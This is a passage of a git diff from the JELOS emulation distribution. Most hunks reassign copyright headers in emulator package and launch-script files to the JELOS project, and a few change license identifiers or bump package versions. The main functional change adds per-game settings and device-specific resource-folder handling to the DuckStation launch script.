+# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/snes9x-lr/package.mk b/packages/emulators/libretro/snes9x-lr/package.mk index 533e007ea..c727f7a33 100644 --- a/packages/emulators/libretro/snes9x-lr/package.mk +++ b/packages/emulators/libretro/snes9x-lr/package.mk @@ -1,7 +1,7 @@ ################################################################################ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/stella-lr/package.mk b/packages/emulators/libretro/stella-lr/package.mk index 1e675d953..9a84c913c 100644 --- a/packages/emulators/libretro/stella-lr/package.mk +++ b/packages/emulators/libretro/stella-lr/package.mk @@ -1,7 +1,7 @@ ################################################################################ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/tic80-lr/package.mk b/packages/emulators/libretro/tic80-lr/package.mk index a6fa6957c..394b820f9 100644 --- a/packages/emulators/libretro/tic80-lr/package.mk +++ b/packages/emulators/libretro/tic80-lr/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="tic80-lr" PKG_VERSION="f740bff14921fe2120486c8a233094602032b996" diff --git a/packages/emulators/libretro/tyrquake-lr/scripts/Quake.sh b/packages/emulators/libretro/tyrquake-lr/scripts/Quake.sh index 60c74363b..efe7883ea 100644 --- a/packages/emulators/libretro/tyrquake-lr/scripts/Quake.sh +++ b/packages/emulators/libretro/tyrquake-lr/scripts/Quake.sh @@ -1,4 +1,4 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) /usr/bin/retroarch -L /usr/lib/libretro/tyrquake_libretro.so /storage/roms/idtech/quakepaks/id1/* diff --git a/packages/emulators/libretro/vice-lr/package.mk b/packages/emulators/libretro/vice-lr/package.mk index e45b5c2a6..53cfe7048 100644 --- a/packages/emulators/libretro/vice-lr/package.mk +++ b/packages/emulators/libretro/vice-lr/package.mk @@ -2,7 +2,7 @@ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2020 351ELEC team (https://github.com/fewtarius/351ELEC) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/vitaquake2-lr/package.mk b/packages/emulators/libretro/vitaquake2-lr/package.mk index 488589327..24e1c4bcd 100644 --- a/packages/emulators/libretro/vitaquake2-lr/package.mk +++ b/packages/emulators/libretro/vitaquake2-lr/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="vitaquake2-lr" PKG_VERSION="6bb3ee592169694b055e7efd5fa2a4e57875bddd" diff --git a/packages/emulators/libretro/vitaquake3-lr/package.mk b/packages/emulators/libretro/vitaquake3-lr/package.mk index 52f56b42d..bc5ce4693 100644 --- a/packages/emulators/libretro/vitaquake3-lr/package.mk +++ b/packages/emulators/libretro/vitaquake3-lr/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="vitaquake3-lr" PKG_VERSION="7a633867cf0a35c71701aef6fc9dd9dfab9c33a9" diff --git a/packages/emulators/standalone/aethersx2-sa/package.mk b/packages/emulators/standalone/aethersx2-sa/package.mk index 8ee58af8b..77a96b837 100644 --- a/packages/emulators/standalone/aethersx2-sa/package.mk +++ b/packages/emulators/standalone/aethersx2-sa/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="aethersx2-sa" PKG_VERSION="v1.5-3606" diff --git a/packages/emulators/standalone/aethersx2-sa/scripts/start_aethersx2.sh b/packages/emulators/standalone/aethersx2-sa/scripts/start_aethersx2.sh index ff8a99a39..52fbabec4 100755 --- a/packages/emulators/standalone/aethersx2-sa/scripts/start_aethersx2.sh +++ b/packages/emulators/standalone/aethersx2-sa/scripts/start_aethersx2.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/emulators/standalone/amiberry/scripts/start_amiberry.sh b/packages/emulators/standalone/amiberry/scripts/start_amiberry.sh index 985a9475f..656a81962 100755 --- a/packages/emulators/standalone/amiberry/scripts/start_amiberry.sh +++ b/packages/emulators/standalone/amiberry/scripts/start_amiberry.sh @@ -2,7 +2,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 0riginally created by Escalade (https://github.com/escalade) # Copyright (C) 2018-present 5schatten (https://github.com/5schatten) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/emulators/standalone/cemu-sa/package.mk b/packages/emulators/standalone/cemu-sa/package.mk index dece87c3d..08c94a9f5 100644 --- a/packages/emulators/standalone/cemu-sa/package.mk +++ b/packages/emulators/standalone/cemu-sa/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2022-present Frank Hartung (supervisedthinking (@) gmail.com) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="cemu-sa" PKG_VERSION="f3c95f7" diff --git a/packages/emulators/standalone/cemu-sa/scripts/start_cemu.sh b/packages/emulators/standalone/cemu-sa/scripts/start_cemu.sh index 73cce874d..ca0dc86a3 100755 --- a/packages/emulators/standalone/cemu-sa/scripts/start_cemu.sh +++ b/packages/emulators/standalone/cemu-sa/scripts/start_cemu.sh @@ -1,7 +1,7 @@ #!/bin/sh # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2022-present Frank Hartung (supervisedthinking (@) gmail.com) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Source environment variables . /etc/profile diff --git a/packages/emulators/standalone/citra-sa/package.mk b/packages/emulators/standalone/citra-sa/package.mk index ebabfe5ee..5ac4f11a7 100644 --- a/packages/emulators/standalone/citra-sa/package.mk +++ b/packages/emulators/standalone/citra-sa/package.mk @@ -1,8 +1,8 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="citra-sa" -PKG_VERSION="a034c54f91495e6c987e3c3d221c7f7615d60a56" +PKG_VERSION="2f4039858a082818b8fff60a7a89794c6259f146" PKG_LICENSE="MPLv2" PKG_SITE="https://github.com/JustEnoughLinuxOS/citra-canary" PKG_URL="${PKG_SITE}.git" diff --git a/packages/emulators/standalone/citra-sa/scripts/start_citra.sh b/packages/emulators/standalone/citra-sa/scripts/start_citra.sh index c081fdf36..1daff7d82 100644 --- a/packages/emulators/standalone/citra-sa/scripts/start_citra.sh +++ b/packages/emulators/standalone/citra-sa/scripts/start_citra.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile jslisten set "-9 citra" diff --git a/packages/emulators/standalone/dolphin-sa/package.mk b/packages/emulators/standalone/dolphin-sa/package.mk index eacb26e77..da12c9e5d 100644 --- a/packages/emulators/standalone/dolphin-sa/package.mk +++ b/packages/emulators/standalone/dolphin-sa/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="dolphin-sa" PKG_LICENSE="GPLv2" diff --git a/packages/emulators/standalone/dolphin-sa/scripts/start_dolphin_gc.sh b/packages/emulators/standalone/dolphin-sa/scripts/start_dolphin_gc.sh index 0cc2fae11..fbe47ad0b 100755 --- a/packages/emulators/standalone/dolphin-sa/scripts/start_dolphin_gc.sh +++ b/packages/emulators/standalone/dolphin-sa/scripts/start_dolphin_gc.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile jslisten set "-9 dolphin-emu-nogui" diff --git a/packages/emulators/standalone/dolphin-sa/scripts/start_dolphin_wii.sh b/packages/emulators/standalone/dolphin-sa/scripts/start_dolphin_wii.sh index 7b3fbad3c..199aae6d3 100755 --- a/packages/emulators/standalone/dolphin-sa/scripts/start_dolphin_wii.sh +++ b/packages/emulators/standalone/dolphin-sa/scripts/start_dolphin_wii.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile jslisten set "-9 dolphin-emu-nogui" diff --git a/packages/emulators/standalone/drastic-sa/package.mk b/packages/emulators/standalone/drastic-sa/package.mk index 36bdaf26f..69e911ff9 100644 --- a/packages/emulators/standalone/drastic-sa/package.mk +++ b/packages/emulators/standalone/drastic-sa/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="drastic-sa" PKG_VERSION="1.0" diff --git a/packages/emulators/standalone/drastic-sa/scripts/S922X/start_drastic.sh b/packages/emulators/standalone/drastic-sa/scripts/S922X/start_drastic.sh index fb96c2341..cdba4fc64 100644 --- a/packages/emulators/standalone/drastic-sa/scripts/S922X/start_drastic.sh +++ b/packages/emulators/standalone/drastic-sa/scripts/S922X/start_drastic.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/emulators/standalone/drastic-sa/scripts/start_drastic.sh b/packages/emulators/standalone/drastic-sa/scripts/start_drastic.sh index e81fcc3d3..c1d733ee5 100644 --- a/packages/emulators/standalone/drastic-sa/scripts/start_drastic.sh +++ b/packages/emulators/standalone/drastic-sa/scripts/start_drastic.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/emulators/standalone/duckstation-sa/package.mk b/packages/emulators/standalone/duckstation-sa/package.mk index 6fbc681a2..5b69568f0 100644 --- a/packages/emulators/standalone/duckstation-sa/package.mk +++ b/packages/emulators/standalone/duckstation-sa/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="duckstation-sa" PKG_LICENSE="GPLv3" @@ -70,9 +70,23 @@ makeinstall_target() { mkdir -p ${INSTALL}/usr/config/duckstation cp -rf ${PKG_BUILD}/.${TARGET_NAME}/bin/* ${INSTALL}/usr/config/duckstation cp -rf ${PKG_DIR}/config/${DEVICE}/* ${INSTALL}/usr/config/duckstation + cp -rf ${PKG_BUILD}/data/* ${INSTALL}/usr/config/duckstation rm -rf ${INSTALL}/usr/config/duckstation/duckstation-nogui rm -rf ${INSTALL}/usr/config/duckstation/common-tests chmod +x ${INSTALL}/usr/bin/start_duckstation.sh } + +post_install() { + case ${DEVICE} in + RK356*) + RESOURCE_FOLDER="database" + ;; + *) + RESOURCE_FOLDER="resources" + ;; + esac + sed -e "s/@RESOURCE_FOLDER@/${RESOURCE_FOLDER}/g" \ + -i ${INSTALL}/usr/bin/start_duckstation.sh +} diff --git a/packages/emulators/standalone/duckstation-sa/patches/wayland/aarch64/003-fix-wayland-compile.patch b/packages/emulators/standalone/duckstation-sa/patches/wayland/aarch64/003-fix-wayland-compile.patch index 557ed42d2..8f478de7f 100644 --- a/packages/emulators/standalone/duckstation-sa/patches/wayland/aarch64/003-fix-wayland-compile.patch +++ b/packages/emulators/standalone/duckstation-sa/patches/wayland/aarch64/003-fix-wayland-compile.patch @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) diff --git a/src/util/platform_misc_unix.cpp b/src/util/platform_misc_unix.cpp index 1f7ae9ec..e0487476 100644 diff --git a/packages/emulators/standalone/duckstation-sa/scripts/start_duckstation.sh b/packages/emulators/standalone/duckstation-sa/scripts/start_duckstation.sh index 855335e0e..7a6cded48 100644 --- a/packages/emulators/standalone/duckstation-sa/scripts/start_duckstation.sh +++ b/packages/emulators/standalone/duckstation-sa/scripts/start_duckstation.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile jslisten set "-9 duckstation-nogui" @@ -22,8 +22,7 @@ fi ln -sfv "/storage/roms/savestates/psx" "/storage/.config/duckstation/savestates" #Copy gamecontroller db file from the device. -cp -rf /storage/.config/SDL-GameControllerDB/gamecontrollerdb.txt /storage/.config/duckstation/database/gamecontrollerdb.txt -cp -rf /storage/.config/SDL-GameControllerDB/gamecontrollerdb.txt /storage/.config/duckstation/resources/gamecontrollerdb.txt +cp -rf /storage/.config/SDL-GameControllerDB/gamecontrollerdb.txt /storage/.config/duckstation/@RESOURCE_FOLDER@/gamecontrollerdb.txt #Set the cores to use CORES=$(get_setting "cores" "${PLATFORM}" "${ROMNAME##*/}") @@ -40,7 +39,53 @@ fi #Emulation Station Features GAME=$(echo "${1}"| sed "s#^/.*/##") + ASPECT=$(get_setting aspect_ratio psx "${GAME}") + FPS=$(get_setting show_fps psx "${GAME}") + IRES=$(get_setting internal_resolution psx "${GAME}") RENDERER=$(get_setting graphics_backend psx "${GAME}") + VSYNC=$(get_setting vsync psx "${GAME}") + + #Aspect Ratio + if [ "$ASPECT" = "0" ] + then + sed -i '/^AspectRatio/c\AspectRatio = 4:3' /storage/.config/duckstation/settings.ini + fi + if [ "$ASPECT" = "1" ] + then + sed -i '/^AspectRatio/c\AspectRatio = 16:9' /storage/.config/duckstation/settings.ini + fi + + #Show FPS + if [ "$FPS" = "false" ] + then + sed -i '/^ShowFPS/c\ShowFPS = false' /storage/.config/duckstation/settings.ini + fi + if [ "$FPS" = "true" ] + then + sed -i '/^ShowFPS/c\ShowFPS = true' /storage/.config/duckstation/settings.ini + fi + + #Internal Resolution + if [ "$IRES" = "1" ] + then + sed -i '/^ResolutionScale =/c\ResolutionScale = 1' /storage/.config/duckstation/settings.ini + fi + if [ "$IRES" = "2" ] + then + sed -i '/^ResolutionScale =/c\ResolutionScale = 2' /storage/.config/duckstation/settings.ini + fi + if [ "$IRES" = "3" ] + then + sed -i '/^ResolutionScale =/c\ResolutionScale = 3' /storage/.config/duckstation/settings.ini + fi + if [ "$IRES" = "4" ] + then + sed -i '/^ResolutionScale =/c\ResolutionScale = 4' /storage/.config/duckstation/settings.ini + fi + if [ "$IRES" = "5" ] + then + sed -i '/^ResolutionScale =/c\ResolutionScale = 5' /storage/.config/duckstation/settings.ini + fi #Video Backend if [ "$RENDERER" = "opengl" ] @@ -56,5 +101,16 @@ fi sed -i '/^Renderer =/c\Renderer = Software' /storage/.config/duckstation/settings.ini fi + #VSYNC + if [ "$VSYNC" = "off" ] + then + sed -i '/^VSync =/c\VSync = false' /storage/.config/duckstation/settings.ini + fi + if [ "$VSYNC" = "on" ] + then + sed -i '/^VSync =/c\VSync = true' /storage/.config/duckstation/settings.ini + fi + + #Run Duckstation ${EMUPERF} duckstation-nogui -fullscreen -settings "/storage/.config/duckstation/settings.ini" -- "${1}" > /dev/null 2>&1 diff --git a/packages/emulators/standalone/flycast-sa/package.mk b/packages/emulators/standalone/flycast-sa/package.mk index 085f604c5..d6712a019 100644 --- a/packages/emulators/standalone/flycast-sa/package.mk +++ b/packages/emulators/standalone/flycast-sa/package.mk @@ -1,10 +1,9 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2021-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="flycast-sa" -PKG_VERSION="35b7be39053a7564026417c33a4b956fe23e2608" +PKG_VERSION="e55d70c0e6bc09a0ee6d7b8cae3136bb66af537c" PKG_LICENSE="GPLv2" PKG_SITE="https://github.com/flyinghead/flycast" PKG_URL="${PKG_SITE}.git" diff --git a/packages/emulators/standalone/flycast-sa/scripts/start_flycast.sh b/packages/emulators/standalone/flycast-sa/scripts/start_flycast.sh index 5c8e20592..7dbfbdbef 100644 --- a/packages/emulators/standalone/flycast-sa/scripts/start_flycast.sh +++ b/packages/emulators/standalone/flycast-sa/scripts/start_flycast.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile jslisten set "-9 flycast" diff --git a/packages/emulators/standalone/gzdoom-sa/package.mk b/packages/emulators/standalone/gzdoom-sa/package.mk index 3b09f14fc..ef037565e 100644 --- a/packages/emulators/standalone/gzdoom-sa/package.mk +++ b/packages/emulators/standalone/gzdoom-sa/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2021-present 351ELEC (https://github.com/351ELEC) -# Copyright (C) 2022 Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Copyright (C) 2023-present brooksytech (https://github.com/brookstech) PKG_NAME="gzdoom-sa" diff --git a/packages/emulators/standalone/gzdoom-sa/zmusic/package.mk b/packages/emulators/standalone/gzdoom-sa/zmusic/package.mk index f30f05590..98aa911ea 100644 --- a/packages/emulators/standalone/gzdoom-sa/zmusic/package.mk +++ b/packages/emulators/standalone/gzdoom-sa/zmusic/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2021-present 351ELEC (https://github.com/351ELEC) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="zmusic" PKG_VERSION="d8e6e28879ee97d00ce0eb9ad13ba462d85faf29" diff --git a/packages/emulators/standalone/hypseus-singe/package.mk b/packages/emulators/standalone/hypseus-singe/package.mk index b5d6d6b60..4fd362593 100644 --- a/packages/emulators/standalone/hypseus-singe/package.mk +++ b/packages/emulators/standalone/hypseus-singe/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2021-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="hypseus-singe" PKG_VERSION="fb981e2c2f963d32d5dbf88083539ef6762bbc85" diff --git a/packages/emulators/standalone/hypseus-singe/sources/start_hypseus.sh b/packages/emulators/standalone/hypseus-singe/sources/start_hypseus.sh index 9e97ae87c..a53309e52 100755 --- a/packages/emulators/standalone/hypseus-singe/sources/start_hypseus.sh +++ b/packages/emulators/standalone/hypseus-singe/sources/start_hypseus.sh @@ -2,7 +2,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2021-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) dir="${1}" name=${dir##*/} diff --git a/packages/emulators/standalone/melonds-sa/package.mk b/packages/emulators/standalone/melonds-sa/package.mk index b5c2b169f..391942eeb 100644 --- a/packages/emulators/standalone/melonds-sa/package.mk +++ b/packages/emulators/standalone/melonds-sa/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="melonds-sa" PKG_LICENSE="GPLv3" diff --git a/packages/emulators/standalone/melonds-sa/patches/003-fix-audio.patch b/packages/emulators/standalone/melonds-sa/patches/003-fix-audio.patch index 56111e55b..960c34996 100644 --- a/packages/emulators/standalone/melonds-sa/patches/003-fix-audio.patch +++ b/packages/emulators/standalone/melonds-sa/patches/003-fix-audio.patch @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) diff --git a/src/frontend/qt_sdl/Platform.cpp b/src/frontend/qt_sdl/Platform.cpp index f9eaf42..ff4bc03 100644 diff --git a/packages/emulators/standalone/melonds-sa/scripts/start_melonds.sh b/packages/emulators/standalone/melonds-sa/scripts/start_melonds.sh index 1ba6a54c9..ca4c4ac24 100644 --- a/packages/emulators/standalone/melonds-sa/scripts/start_melonds.sh +++ b/packages/emulators/standalone/melonds-sa/scripts/start_melonds.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/emulators/standalone/minivmacsa/package.mk b/packages/emulators/standalone/minivmacsa/package.mk index 8a43257b8..5977dd4f3 100644 --- a/packages/emulators/standalone/minivmacsa/package.mk +++ b/packages/emulators/standalone/minivmacsa/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0 -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="minivmacsa" PKG_VERSION="37.03" diff --git a/packages/emulators/standalone/minivmacsa/sources/start_minivmac.sh b/packages/emulators/standalone/minivmacsa/sources/start_minivmac.sh index 4d126bd96..7279cb197 100644 --- a/packages/emulators/standalone/minivmacsa/sources/start_minivmac.sh +++ b/packages/emulators/standalone/minivmacsa/sources/start_minivmac.sh @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present - Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-audio-sdl/package.mk b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-audio-sdl/package.mk index 93c58ec2d..5fa5496a2 100644 --- a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-audio-sdl/package.mk +++ b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-audio-sdl/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) # Copyright (C) 2023 Nicholas Ricciuti (rishooty@gmail.com) -# Copyright (C) 2023 Fewtarius (fewtarius@jelos.org) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="mupen64plus-sa-audio-sdl" PKG_VERSION="cec70e42b4535ce5bd1be24e7d816c54b3e75673" diff --git a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-core/package.mk b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-core/package.mk index 1dc022cbb..a2ee46b78 100644 --- a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-core/package.mk +++ b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-core/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) # Copyright (C) 2023 Nicholas Ricciuti (rishooty@gmail.com) -# Copyright (C) 2023 Fewtarius (fewtarius@jelos.org) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="mupen64plus-sa-core" #PKG_VERSION="676f24708d1f7a8e68f9f77c6dd5e219c3960e1e" diff --git a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-core/scripts/start_mupen64plus.sh b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-core/scripts/start_mupen64plus.sh index 937c32e44..c53b40557 100644 --- a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-core/scripts/start_mupen64plus.sh +++ b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-core/scripts/start_mupen64plus.sh @@ -2,7 +2,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2021-present 351ELEC (https://github.com/351ELEC) -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-input-sdl/package.mk b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-input-sdl/package.mk index ff49da9f1..608db25dc 100644 --- a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-input-sdl/package.mk +++ b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-input-sdl/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) # Copyright (C) 2023 Nicholas Ricciuti (rishooty@gmail.com) -# Copyright (C) 2023 Fewtarius (fewtarius@jelos.org) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="mupen64plus-sa-input-sdl" PKG_VERSION="b175a41675ba39ac3ce6f152355dca92d9d32207" diff --git a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-rsp-cxd4/package.mk b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-rsp-cxd4/package.mk index c794095e8..d96607588 100644 --- a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-rsp-cxd4/package.mk +++ b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-rsp-cxd4/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) # Copyright (C) 2023 Nicholas Ricciuti (rishooty@gmail.com) -# Copyright (C) 2023 Fewtarius (fewtarius@jelos.org) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="mupen64plus-sa-rsp-cxd4" PKG_VERSION="0a4e30f56033396e3ba47ec0fdd7acea3522362a" diff --git a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-rsp-hle/package.mk b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-rsp-hle/package.mk index 4f209cadd..ab60d1100 100644 --- a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-rsp-hle/package.mk +++ b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-rsp-hle/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) # Copyright (C) 2023 Nicholas Ricciuti (rishooty@gmail.com) -# Copyright (C) 2023 Fewtarius (fewtarius@jelos.org) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) 